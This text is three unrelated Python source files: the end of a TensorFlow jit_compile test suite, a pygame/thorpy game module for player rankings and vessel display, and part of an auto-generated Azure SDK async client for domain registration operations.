v.device)['current'] if on_gpu else 0
self.assertEqual(initial_usage, final_usage)
@test_util.disable_mlir_bridge('MLIR does not support resource update for'
' signature with compile-time constant.')
def testUpdateVariableWithCompileTimeConstMemoryUsage(self):
with ops.device('device:{}:0'.format(self.device)):
on_gpu = 'gpu' in self.device.lower()
v = variables.Variable(random_ops.random_normal([1024, 1024]))
# test a signature of (compile-time const, arg, res_var). The compile-time
# const will be optimized away so that the kernel signature will become
# (arg, res_var).
@def_function.function(jit_compile=True)
def update_var(shape, arg):
v.assign_add(array_ops.broadcast_to(arg, shape))
arg = random_ops.random_normal([1])
gc.collect()
initial_usage = context.context().get_memory_info(
v.device)['current'] if on_gpu else 0
update_var(constant_op.constant([1024, 1024]), arg)
gc.collect()
final_usage = context.context().get_memory_info(
v.device)['current'] if on_gpu else 0
self.assertEqual(initial_usage, final_usage)
@test_util.disable_mlir_bridge('TODO(b/162381930): MLIR bridge renames '
' functions')
def testUpdateVariableInClass(self):
with ops.device('device:{}:0'.format(self.device)):
class C(object):
@def_function.function(jit_compile=True)
def update_var(self, a, b):
if not hasattr(self, 'v'):
self.v = variables.Variable(3.1)
self.v.assign_add(a * b)
c = C()
@def_function.function
def outer():
c.update_var(constant_op.constant(0.7), constant_op.constant(0.6))
outer()
self.assertAllClose(c.v, 3.52)
def testUpdateVariableMultipleOutputs(self):
with ops.device('device:{}:0'.format(self.device)):
v = variables.Variable(3.1)
@def_function.function(jit_compile=True)
def update_var(a, b):
v.assign_add(a * b)
return a * b + v
out = update_var(constant_op.constant(0.7), constant_op.constant(0.6))
self.assertAllClose(v, 3.52)
self.assertAllClose(out, 3.94)
def testReturnIdentity(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(a, b):
return (a, b)
a = random_ops.random_normal([10, 10])
b = random_ops.random_normal([10, 10])
on_gpu = 'gpu' in self.device.lower()
gc.collect()
initial_usage = context.context().get_memory_info(
b.backing_device)['current'] if on_gpu else 0
f(a, b)
gc.collect()
final_usage = context.context().get_memory_info(
b.backing_device)['current'] if on_gpu else 0
self.assertEqual(initial_usage, final_usage)
def testGetCompilerIrConstants(self):
if 'tpu' in self.device.lower():
self.skipTest('TPU generates different HLO')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(a, b):
return array_ops.transpose(a, b)
a = array_ops.ones([3, 4, 3], dtype=dtypes.float32)
b = constant_op.constant([0, 2, 1], dtype=dtypes.int32)
self.assertIn('{1,2,0}',
f.experimental_get_compiler_ir(a, b)(stage='optimized_hlo'))
@test_util.disable_mlir_bridge('TODO(b/168732524): MLIR bridge does not '
' optimize single-element tuples to scalars')
def testGetCompilerIrResourceVars(self):
with ops.device('device:{}:0'.format(self.device)):
v = variables.Variable([3.1, 3.2])
@def_function.function(jit_compile=True)
def f(a, b):
v.assign_add(a * b)
a = random_ops.random_normal([2])
b = random_ops.random_normal([2])
self.assertIn('input_output_alias={ {}: (2, {}, may-alias) }',
f.experimental_get_compiler_ir(a, b)('optimized_hlo'))
def testGetCompilerIrNotCompiled(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function
def f(x):
return x + 1
a = random_ops.random_normal([10, 10])
with self.assertRaisesRegex(ValueError,
'marked with \'jit_compile'):
f.experimental_get_compiler_ir(a)()
def testGetCompilerIrNested(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x, a):
return x + a
@def_function.function(jit_compile=False)
def fn2(x, a):
fn.experimental_get_compiler_ir(x, a)()
return fn(x, a)
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaises(TypeError):
fn2(inputs, 1)
def testGetCompilerIrKwargs(self):
with ops.device('device:{}:0'.format(self.device)):
v = variables.Variable([0.1, 0.1])
@def_function.function(jit_compile=True)
def f(a, b):
return (a + b) * v
a = constant_op.constant([1.1, 1.1])
b = constant_op.constant([2.2, 2.2])
self.assertIn('multiply',
f.experimental_get_compiler_ir(b=a, a=b)(stage='hlo'))
def testGetCompilerIrDot(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(a, b):
return a + b
a = constant_op.constant([1.1, 1.1])
b = constant_op.constant([2.2, 2.2])
self.assertIn(
'label',
f.experimental_get_compiler_ir(a, b)(stage='optimized_hlo_dot'))
def testGetCompilerIrNoDevicePlacement(self):
if 'gpu' not in self.device.lower():
self.skipTest('Testing get_compiler_ir on GPUs without placement')
@def_function.function(jit_compile=True)
def f(a, b):
return a + b
a = constant_op.constant([1.1, 1.1])
b = constant_op.constant([2.2, 2.2])
self.assertIn(
'label',
f.experimental_get_compiler_ir(a, b)(stage='optimized_hlo_dot'))
def testGetCompilerIrNonTensors(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(l):
return l[0] + l[1]
l = [constant_op.constant(1.1), constant_op.constant(2.2)]
self.assertIn('tuple',
f.experimental_get_compiler_ir(l)())
def testGetCompilerIrSerialized(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x):
return x - x
inputs = constant_op.constant([1, 2, 2, 3, 3])
for stage in ('hlo_serialized', 'optimized_hlo_serialized'):
hlo = fn.experimental_get_compiler_ir(inputs)(
stage=stage, device_name=f'/device:{self.device}:0')
self.assertIsInstance(hlo, bytes)
def testDotOptimizedHlo(self):
with ops.device('device:{}:0'.format(self.device)):
a = random_ops.random_normal([100, 100])
b = random_ops.random_normal([100, 100])
@def_function.function(jit_compile=True)
def f(a, b):
return math_ops.matmul(a, b)
self.assertRegex(f.experimental_get_compiler_ir(a, b)('optimized_hlo'),
'(dot)|(convolution)')
def testConstantOnWrongDevice(self):
with ops.device('device:{}:0'.format(self.device)):
s = random_ops.random_uniform([2], 1, 10, dtypes.int32)
l = random_ops.random_normal([s[0] * s[1]])
@def_function.function(jit_compile=True)
def f(l):
return array_ops.reshape(l, s)
self.assertIn('tuple',
f.experimental_get_compiler_ir(l)())
@test_util.disable_mlir_bridge('TODO(b/172845417): MLIR bridge does not '
'support getting constants out of resources')
def testGetConstantOutOfResourceVariable(self):
with ops.device('device:{}:0'.format(self.device)):
# Use floats to force device placement.
a = variables.Variable(50.0)
b = variables.Variable(2.0)
@def_function.function(jit_compile=True)
def f(x):
return array_ops.reshape(
x, [math_ops.cast(a, dtypes.int32),
math_ops.cast(b, dtypes.int32)])
# OK since the value is known at compile time.
out = f(random_ops.random_normal([10, 10]))
self.assertEqual(out.shape[0], 50)
self.assertEqual(out.shape[1], 2)
@test_util.disable_mlir_bridge('TODO(b/172845417): MLIR bridge does not '
'support getting constants out of resources')
def testGetConstantOutOfResourceVariableAfterWrite(self):
with ops.device('device:{}:0'.format(self.device)):
# Use floats to force device placement.
a = variables.Variable(50.0)
b = variables.Variable(2.0)
@def_function.function(jit_compile=True)
def f(x, val1, val2):
a.assign(math_ops.cast(val1, dtypes.float32))
b.assign(math_ops.cast(val2, dtypes.float32))
return array_ops.reshape(
x, [math_ops.cast(a, dtypes.int32),
math_ops.cast(b, dtypes.int32)])
val1 = constant_op.constant(2)
val2 = constant_op.constant(50)
      # Returns an error, since the value known at compile time was overridden.
with self.assertRaisesRegex(errors.InvalidArgumentError,
'concrete values at compile time'):
f(random_ops.random_normal([10, 10]), val1, val2)
@test_util.disable_mlir_bridge('TODO(b/172845417): MLIR bridge does not '
'support getting constants out of resources')
def testGetConstantOutOfResourceVariableBeforeWrite(self):
with ops.device('device:{}:0'.format(self.device)):
# Use floats to force device placement.
a = variables.Variable(50.0)
b = variables.Variable(2.0)
@def_function.function(jit_compile=True)
def f(x, val1, val2):
out = array_ops.reshape(
x, [math_ops.cast(a, dtypes.int32),
math_ops.cast(b, dtypes.int32)])
a.assign(math_ops.cast(val1, dtypes.float32))
b.assign(math_ops.cast(val2, dtypes.float32))
return out
val1 = constant_op.constant(2)
val2 = constant_op.constant(50)
# OK since the write happens after the reshape.
out = f(random_ops.random_normal([10, 10]), val1, val2)
self.assertEqual(out.shape[0], 50)
self.assertEqual(out.shape[1], 2)
def testTfAssert(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
control_flow_ops.Assert(x == 1, ['Wrong value'])
f(constant_op.constant(1))
def testTensorArrayErrorMessage(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f():
        # The error messages of the old and new bridge differ in which op they
        # flag: one points to the creation of the uninitialized tensor array,
        # the other to its use.
ta = tensor_array_ops.TensorArray( # EXPECTED_MESSAGE_NEW
dtype=dtypes.float32,
size=2,
dynamic_size=True,
element_shape=(None,))
return ta.concat() # EXPECTED_MESSAGE_OLD
if test_util.is_mlir_bridge_enabled():
with self.assertRaisesRegex(errors.InvalidArgumentError,
'EXPECTED_MESSAGE_NEW'):
f()
else:
with self.assertRaisesRegex(errors.InvalidArgumentError,
'EXPECTED_MESSAGE_OLD'):
f()
def testCounter(self):
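    # Cell '0' counts tf.functions traced without jit_compile; cell '1' counts
    # those traced with jit_compile=True.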
cell_nojit = def_function._tf_function_counter.get_cell('0')
cell_jit = def_function._tf_function_counter.get_cell('1')
orig_nojit = cell_nojit.value()
orig_jit = cell_jit.value()
with ops.device('device:{}:0'.format(self.device)):
@def_function.function
def f(a):
return a + a
f(constant_op.constant(1))
self.assertEqual(cell_nojit.value(), orig_nojit + 1)
self.assertEqual(cell_jit.value(), orig_jit)
f(constant_op.constant(1.)) # Calling again does not increment
self.assertEqual(cell_nojit.value(), orig_nojit + 1)
@def_function.function(jit_compile=True)
def f1(a):
return a + a
f1(constant_op.constant(1))
self.assertEqual(cell_nojit.value(), orig_nojit + 1)
self.assertEqual(cell_jit.value(), orig_jit + 1)
@def_function.function
def f2(a):
@def_function.function
def g(a):
return a + a
@def_function.function(jit_compile=True)
def h(a):
return a + a
return g(a) + h(a)
f2(constant_op.constant(1))
self.assertEqual(cell_nojit.value(), orig_nojit + 2)
self.assertEqual(cell_jit.value(), orig_jit + 2)
@def_function.function(jit_compile=True)
def f3(a):
@def_function.function
def g(a):
return a + a
@def_function.function(jit_compile=True)
def h(a):
return a + a
return g(a) + h(a)
f3(constant_op.constant(1))
self.assertEqual(cell_nojit.value(), orig_nojit + 2)
self.assertEqual(cell_jit.value(), orig_jit + 3)
@test_util.disable_mlir_bridge('TODO(b/162272821): MLIR bridge returns '
' wrong status type')
def testResourceWrongDevice(self):
if 'gpu' not in self.device.lower():
self.skipTest('Need a GPU to have non-trivial device placement')
with ops.device('device:CPU:0'):
v = variables.Variable([3.1, 3.2])
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(experimental_compile=True)
def update_var(a):
v.assign_add(a)
arg = random_ops.random_normal([2])
with self.assertRaisesRegex(errors.InvalidArgumentError,
'Trying to access resource .*'):
update_var(arg)
def testMustBeConstantInsideCondition(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x, d):
if math_ops.reduce_all(
math_ops.greater(x, random_ops.random_normal([10, 10]))):
return array_ops.reshape(x * 2, constant_op.constant([100]))
else:
return array_ops.reshape(x * 3, d)
f(random_ops.random_normal([10, 10]), constant_op.constant([100]))
def testConditionalGradientTapeMathRegression(self):
with ops.device('device:{}:0'.format(self.device)):
with backprop.GradientTape():
@def_function.function(jit_compile=True, autograph=False)
def f(x):
return control_flow_ops.cond(
math_ops.reduce_all(x > 1), lambda: 1. / x, lambda: x)
v = variables.Variable([[2.]])
self.assertAllClose(f(v), constant_op.constant([[0.5]]))
@test_util.disable_mlir_bridge('TODO(b/190444466): MLIR bridge seems to '
'ignore resource assignments')
def testErrMsgAssignWrongShape(self):
with ops.device('device:{}:0'.format(self.device)):
v = variables.Variable([3.1, 3.2])
@def_function.function(jit_compile=True)
def f(samples):
v.assign(array_ops.zeros(samples)) # assignment
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Shape .* cannot be changed after initialization'):
f(constant_op.constant(6))
with self.assertRaisesRegex(errors.InvalidArgumentError, 'assignment'):
f(constant_op.constant(6))
def testTfSummaryErrMsg(self):
if 'gpu' not in self.device.lower():
self.skipTest('Only runs on GPU')
with ops.device('device:{}:0'.format(self.device)):
writer = summary_ops_v2.create_file_writer(self.get_temp_dir())
@def_function.function(jit_compile=True)
def my_func_temp():
with writer.as_default():
summary_ops_v2.scalar('my_metric', 0.5, step=10)
with self.assertRaisesRegex(errors.InvalidArgumentError,
'Trying to access resource .*'):
my_func_temp()
def testSinglePassArgmax(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
return math_ops.argmax(x)
hlo = f.experimental_get_compiler_ir(
array_ops.ones([10], dtype=dtypes.float32))(
stage='hlo')
# Test that reduction occurs only once.
self.assertGreater(hlo.count('reduce'), 1)
if __name__ == '__main__':
ops.enable_eager_execution()
test.main()
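# A minimal sketch (not one of the test cases above) of the HLO-inspection
# pattern used in testSinglePassArgmax, applied to an arbitrary jit-compiled
# function; it relies only on the imports already present in this file.
def _example_inspect_hlo():
  @def_function.function(jit_compile=True)
  def double(x):
    return x + x
  # experimental_get_compiler_ir returns a callable that emits the requested
  # compiler stage for the given concrete arguments.
  return double.experimental_get_compiler_ir(
      constant_op.constant([1.0, 2.0]))(stage='hlo')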
|
|
import random
import pygame
from pygame.math import Vector3 as V3
import thorpy
import parameters, drawing, light, camera
import alphabet, scenario
from garage import get_vessel_element
wordgen1 = alphabet.Dictionnary("thorn.txt","thorn_precisions.txt")
namel = 3 # minimum length of generated player names
nameL = 8 # maximum length of generated player names
def get_etitle(name,rect="screen"):
e = thorpy.make_text(name,thorpy.style.FONT_SIZE+8,(255,255,0))
e.stick_to(rect,"top","top")
e.move((0,20))
return e
def get_eok(name, rect="screen"):
e = thorpy.make_button(name,thorpy.functions.quit_menu_func)
e.stick_to(rect,"bottom","bottom")
e.move((0,-20))
return e
def refresh_ranking():
parameters.players.sort(key=lambda x:x.points, reverse=True)
for i,p in enumerate(parameters.players):
p.ranking = i+1
def get_display_options():
varset = thorpy.VarSet()
varset.add("aa", True, "Anti-aliasing: ")
varset.add("visibility", parameters.VISIBILITY, "Max display distance: ", [200,3000])
e = thorpy.ParamSetterLauncher.make([varset], "Display options", "Display options")
return e, varset
def launch_ingame_options():
thorpy.set_theme("classic")
def func():
parameters.scene.refresh_display()
box.blit()
pygame.display.flip()
e, varset = get_display_options()
e2 = thorpy.make_button("Show help",scenario.launch_help,{"func":func})
def leave():
if thorpy.launch_binary_choice("Are you sure?"):
parameters.scene.abandon = True
thorpy.functions.quit_menu_func()
func()
q = thorpy.make_button("Abandon",leave)
box = thorpy.make_ok_box([thorpy.make_text("Pause"),thorpy.Line.make(100,"h"), e,e2,q])
box.e_ok.user_func = thorpy.functions.quit_menu_func
box.e_ok.user_params = {}
## boxletter.set_main_color((200,200,200,50))
box.set_main_color((200,200,255,200))
box.center()
scenario.launch(box)
parameters.scene.cam.set_aa(varset.get_value("aa"))
parameters.VISIBILITY = varset.get_value("visibility")
thorpy.set_theme(parameters.THEME)
## varset = thorpy.VarSet()
## varset.add("name", name, "Name: ")
## varset.add("type", ["Human","Beginner", "Normal", "Hard"],
## "Type: ")
## color=(0,255,0) if name=="Player 1" else (0,0,255)
## varset.add("color", color, "Color: ")
## e = thorpy.ParamSetterLauncher.make([varset], name, name+" options")
## return varset, e
## ps = thorpy.ParamSetterLauncher()
## e = thorpy.Box()
def get_category(position):
k = parameters.NPLAYERS // 3
if position < k:
return parameters.CATEGORIES[0],3
elif position < 2*k:
return parameters.CATEGORIES[1],2
return parameters.CATEGORIES[2],1
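# Worked example (assuming parameters.NPLAYERS == 9, so k == 3): positions 0-2
# return (parameters.CATEGORIES[0], 3), positions 3-5 return
# (parameters.CATEGORIES[1], 2), and every higher position returns
# (parameters.CATEGORIES[2], 1).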
class Player:
def __init__(self, name=None, color=None, money=1000, ranking=None, points=None):
self.name = name
if name is None:
self.name = wordgen1.genWord(random.randint(namel,nameL))
#
self.color = color
if color is None:
self.color = light.Material(random.choice(drawing.colors))
self.money = money
self.vessel = None
self.ranking = ranking
self.points = points
if self.points is None:
self.points = random.randint(0,parameters.NPLAYERS)
def get_element(self,prename=""):
fs = thorpy.style.FONT_SIZE
ename = thorpy.make_text(prename+self.name,fs+4,(255,0,0))
emoney = thorpy.make_text("Money: "+str(self.money))
eranking = thorpy.make_text("Intergalactic Ranking: "+str(self.ranking))
eranking = thorpy.make_text("Intergalactic Points: "+str(self.points))
box = thorpy.Box.make([ename,emoney,eranking])
return box
def get_nearest_players(self):
refresh_ranking()
for i,p in enumerate(parameters.players):
if p is self:
if i == parameters.NPLAYERS-1:
p1 = parameters.players[i-2]
p2 = parameters.players[i-1]
elif i == 0:
p1 = parameters.players[1]
p2 = parameters.players[2]
else:
p1 = parameters.players[i-1]
p2 = parameters.players[i+1]
assert p1 is not p2
return p1,p2
raise Exception("Couldnt find nearest players")
class ShowRanking:
def __init__(self, title, ok_text, ranking, results=False, choosevessel=False):
refresh_ranking()
#
light_pos = V3(0,1000,-1000)
light_m = V3(20,20,20)
light_M = V3(200,200,200)
self.light = light.Light(light_pos, light_m, light_M)
self.viewport = pygame.Surface((400,int(parameters.H*0.6)))
self.viewport_color = (200,200,200)
self.viewport.fill(self.viewport_color)
self.viewport_rect = pygame.Rect((0,0),self.viewport.get_size())
self.viewport_rect.centerx = parameters.W // 2 + 100
self.viewport_rect.centery = parameters.H//2
self.cam = camera.Camera(self.viewport, fov=512, d=2, objs=[])
self.screen = thorpy.get_screen()
self.displayed_vessel = None
self.i = 0
#
if results:
ranking[0].points += 1
ranking[0].money += 300 + (parameters.NPLAYERS-ranking[0].ranking)*100
ranking[2].points -= 1
ranking[2].money += 100
ranking[1].money += 200
if ranking[2].points < 0: ranking[2].points = 0
#
self.trophy = None
if choosevessel:
self.e_players = []
def other_vessel():
self.vessels[0] = create_vessel(parameters.HERO_COLOR)
self.vessels[0].set_pos(V3(0,-1*4.5,20))
self.vessels[0].move(V3(0,4,0))
self.displayed_vessel = self.vessels[0]
#replace self.ve
new_ve = get_vessel_element(self.vessels[0])
self.e_bckgr.replace_element(self.ve, new_ve)
thorpy.functions.refresh_current_menu()
self.ve = new_ve
self.e_bckgr.unblit_and_reblit()
b = thorpy.make_button("Generate another vessel", other_vessel)
c = thorpy.make_button("Done", thorpy.functions.quit_menu_func)
self.e_players.append(b)
self.e_players.append(c)
from main import create_vessel
self.vessels = [create_vessel(parameters.HERO_COLOR)]
self.displayed_vessel = self.vessels[0].get_copy()
self.ve = get_vessel_element(self.vessels[0])
self.e_players.append(self.ve)
else:
if results:
self.e_players = [p.get_element(str(i+1)+") ") for i,p in enumerate(ranking)]
else:
self.e_players = [p.get_element() for i,p in enumerate(ranking)]
self.vessels = [p.vessel.get_copy() for p in ranking]
if results:
import core3d
from light import Material
self.trophy = core3d.Object3D("trophy1.stl")
self.trophy.set_color(Material((255,215,0)))
## self.trophy.set_color((255,255,0))
self.trophy.set_pos(V3(5.,-0*4.5-0.2,15))
self.trophy.rotate_around_center_z(90.)
self.trophy.rotate_around_center_x(-65.)
self.trophy.move(V3(0,4,0))
self.background = thorpy.load_image("background1.jpg")
self.background = thorpy.get_resized_image(self.background,
(parameters.W,parameters.H//2),
type_=max)
self.e_bckgr = thorpy.Background.make(image=self.background,
elements=self.e_players)
#
vw,vh = self.viewport_rect.size
self.e_viewport_frame = thorpy.Element()
painter = thorpy.painterstyle.ClassicFrame((vw+3,vh+3),
color=self.viewport_color,
pressed=True)
self.e_viewport_frame.set_painter(painter)
self.e_viewport_frame.finish()
self.e_viewport_frame.set_center(self.viewport_rect.center)
#
reaction = thorpy.ConstantReaction(thorpy.THORPY_EVENT,
self.refresh_display,
{"id":thorpy.constants.EVENT_TIME})
self.e_bckgr.add_reaction(reaction)
if not choosevessel:
for i,v in enumerate(self.vessels):
pos = self.e_players[i].get_fus_rect().center
v.set_pos(V3(0,-i*4.5,20))
v.move(V3(0,4,0))
else:
self.vessels[0].set_pos(V3(0,-1*4.5,20))
self.vessels[0].move(V3(0,4,0))
#
self.displayed_vessel.set_pos(V3(0,-1*4.5,20))
self.displayed_vessel.move(V3(0,4,0))
#
thorpy.store(self.e_bckgr,gap=40)
for e in self.e_players:
e.stick_to(self.viewport_rect,"left","right",align=False)
e.move((-5,0))
self.e_title = get_etitle(title)
if not choosevessel:
self.e_ok = get_eok(ok_text)
self.e_bckgr.add_elements([self.e_viewport_frame,self.e_title,self.e_ok])
else:
self.e_bckgr.add_elements([self.e_viewport_frame,self.e_title])
self.goback = False
def return_garage():
self.derotate()
self.goback=True
thorpy.functions.quit_menu_func()
if not results and not choosevessel:
self.e_back = thorpy.make_button("Return to garage", return_garage)
self.e_back.stick_to(self.e_ok, "left", "right")
self.e_back.move((-20,0))
self.e_bckgr.add_elements([self.e_back])
if not results:
reaction = thorpy.Reaction(pygame.MOUSEMOTION, self.mousemotion)
self.e_bckgr.add_reaction(reaction)
m = thorpy.Menu(self.e_bckgr)
m.play()
def derotate(self):
pass
## for e in self.vessels:
## e.rotate_around_center_y(-self.i)
## if self.displayed_vessel:
## self.displayed_vessel.rotate_around_center_y(-self.i)
## self.i = 0
def refresh_display(self):
self.viewport.fill(self.viewport_color)
if self.displayed_vessel:
self.displayed_vessel.rotate_around_center_y(1)
self.displayed_vessel.refresh_and_draw(self.cam,self.light)
else:
for v in self.vessels:
v.rotate_around_center_y(1)
v.refresh_and_draw(self.cam,self.light)
if self.trophy:
self.trophy.rotate_around_center_y(1)
self.trophy.refresh_and_draw(self.cam, self.light)
self.screen.blit(self.viewport,self.viewport_rect)
pygame.display.update(self.viewport_rect)
self.i += 1
def mousemotion(self,e):
if self.viewport_rect.collidepoint(pygame.mouse.get_pos()):
thorpy.change_cursor(thorpy.constants.CURSOR_BROKEN)
if pygame.mouse.get_pressed()[0]:
dcx = e.pos[0] - self.viewport_rect.centerx#parameters.W//2
dcy = e.pos[1] - self.viewport_rect.centery#parameters.H//2
dist = dcx*dcx + dcy*dcy
k = -1.
#vertical mouse motion is blended between z- and x-rotation: a*rotate_z + (1-a)*rotate_x = k*rel.y
#horizontal mouse motion drives the y-rotation: rotate_y = k*rel.x
#the farther the cursor is from the viewport center, the larger a gets
a = dist / float(parameters.W//2)**2
rotate_z = a * k * e.rel[1]
rotate_x = (1.-a) * k * e.rel[1]
rotate_y = k * e.rel[0]
if self.displayed_vessel:
self.displayed_vessel.rotate_around_center_x(rotate_x)
self.displayed_vessel.rotate_around_center_y(rotate_y)
self.displayed_vessel.rotate_around_center_z(rotate_z)
else:
thorpy.change_cursor(thorpy.constants.CURSOR_NORMAL)
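# Typical (hypothetical) invocations of ShowRanking, for orientation only:
# ShowRanking("Intergalactic ranking", "Continue", parameters.players) shows the
# current standings; results=True additionally applies the points/money payout,
# and choosevessel=True lets the player regenerate and confirm a vessel.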
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._domains_operations import build_check_availability_request, build_create_or_update_ownership_identifier_request, build_create_or_update_request_initial, build_delete_ownership_identifier_request, build_delete_request, build_get_control_center_sso_request_request, build_get_ownership_identifier_request, build_get_request, build_list_by_resource_group_request, build_list_ownership_identifiers_request, build_list_recommendations_request, build_list_request, build_renew_request, build_update_ownership_identifier_request, build_update_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DomainsOperations:
"""DomainsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.web.v2020_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def check_availability(
self,
identifier: "_models.NameIdentifier",
**kwargs: Any
) -> "_models.DomainAvailabilityCheckResult":
"""Check if a domain is available for registration.
Description for Check if a domain is available for registration.
:param identifier: Name of the domain.
:type identifier: ~azure.mgmt.web.v2020_09_01.models.NameIdentifier
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainAvailabilityCheckResult, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.DomainAvailabilityCheckResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainAvailabilityCheckResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(identifier, 'NameIdentifier')
request = build_check_availability_request(
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.check_availability.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainAvailabilityCheckResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_availability.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/checkDomainAvailability'} # type: ignore
@distributed_trace
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.DomainCollection"]:
"""Get all domains in a subscription.
Description for Get all domains in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DomainCollection or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.DomainCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("DomainCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/domains'} # type: ignore
@distributed_trace_async
async def get_control_center_sso_request(
self,
**kwargs: Any
) -> "_models.DomainControlCenterSsoRequest":
"""Generate a single sign-on request for the domain management portal.
Description for Generate a single sign-on request for the domain management portal.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainControlCenterSsoRequest, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.DomainControlCenterSsoRequest
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainControlCenterSsoRequest"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_control_center_sso_request_request(
subscription_id=self._config.subscription_id,
template_url=self.get_control_center_sso_request.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainControlCenterSsoRequest', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_control_center_sso_request.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/generateSsoRequest'} # type: ignore
@distributed_trace
def list_recommendations(
self,
parameters: "_models.DomainRecommendationSearchParameters",
**kwargs: Any
